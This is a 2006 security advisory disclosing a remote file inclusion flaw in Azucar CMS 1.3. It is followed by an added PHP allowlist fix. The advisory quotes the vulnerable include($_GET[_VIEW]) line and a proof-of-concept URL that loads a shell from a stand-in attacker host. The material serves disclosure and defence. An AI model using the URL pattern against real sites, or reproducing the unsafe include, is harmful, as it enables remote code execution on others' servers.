Azucar CMS <= 1.3 (_VIEW) Remote File Include Vulnerability

2006-12-20T00:00:00
ID SECURITYVULNS:DOC:15452
Type securityvulns
Reporter Securityvulns
Modified 2006-12-20T00:00:00

Description

+-------------------------------------------------------------------------------------------
+ Azucar CMS <= 1.3 (_VIEW) Remote File Include Vulnerability
+-------------------------------------------------------------------------------------------
+ Affected Software .: Azucar CMS <= 1.3
+ Download ..........: http://downloads.sourceforge.net/azucarcms/azucarcms1.3.zip
+ Description .......: "Azucar is a modular content management system designed to be extremely user friendly"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ Azucar CMS admin/index_sitios.php uses the include function insecurely on the $_GET[_VIEW]
+ parameter passed to the script; a remote file can be specified and executed on the server.
+
+ Vulnerable Code:
+ admin/index_sitios.php, line(s) 14-15:
+ -> 14-15: if (isset($_GET[_VIEW])) include($_GET[_VIEW]);
+
+ Proof Of Concept:
+ http://[target]/[path]/admin/index_sitios.php?_VIEW=http://evilsite.com/shell.php
+-------------------------------------------------------------------------------------------
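As an added example (not code from the advisory or from the Azucar CMS project), this is how the include on line 14-15 can be hardened: the request is allowed only to pick a key from a fixed allowlist of local view files, never to supply a path or URL. The view names and file paths are hypothetical.

```php
<?php
// Added hardening example, not Azucar CMS code. Replaces the unsafe
//   if (isset($_GET[_VIEW])) include($_GET[_VIEW]);
// Note the original also uses the bareword _VIEW instead of the string '_VIEW'.

// Hypothetical allowlist: request key => fixed local file. Nothing from
// the request is ever used as a path, so remote URLs, '../' sequences and
// absolute paths cannot reach include() at all.
$allowed_views = [
    'sitios'   => __DIR__ . '/views/sitios.php',
    'usuarios' => __DIR__ . '/views/usuarios.php',
];

// Resolve the requested view strictly through the allowlist; any value that
// is not an exact allowlist key (including arrays from _VIEW[]=x) falls back
// to the default view instead of being interpreted as a filename.
function resolve_view(array $allowed, $requested, string $default): string
{
    if (is_string($requested) && array_key_exists($requested, $allowed)) {
        return $allowed[$requested];
    }
    return $allowed[$default];
}

$view = resolve_view($allowed_views, $_GET['_VIEW'] ?? null, 'sitios');
include $view;
```

Setting allow_url_include=Off in php.ini (the default since PHP 5.2) blocks the remote-URL case shown in the proof of concept, but does not stop local file inclusion through the same parameter, so the allowlist is still needed.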